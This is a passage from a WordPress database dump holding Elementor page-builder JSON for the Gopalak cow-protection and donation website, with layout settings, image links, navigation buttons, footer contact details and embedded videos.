9356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12286,2015,'_elementor_page_assets','a:0:{}'),(12288,2016,'_elementor_edit_mode','builder'),(12289,2016,'_elementor_template_type','wp-page'),(12290,2016,'_elementor_version','3.7.8'),(12291,2016,'_wp_page_template','elementor_canvas'),(12292,2016,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#43693F\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gop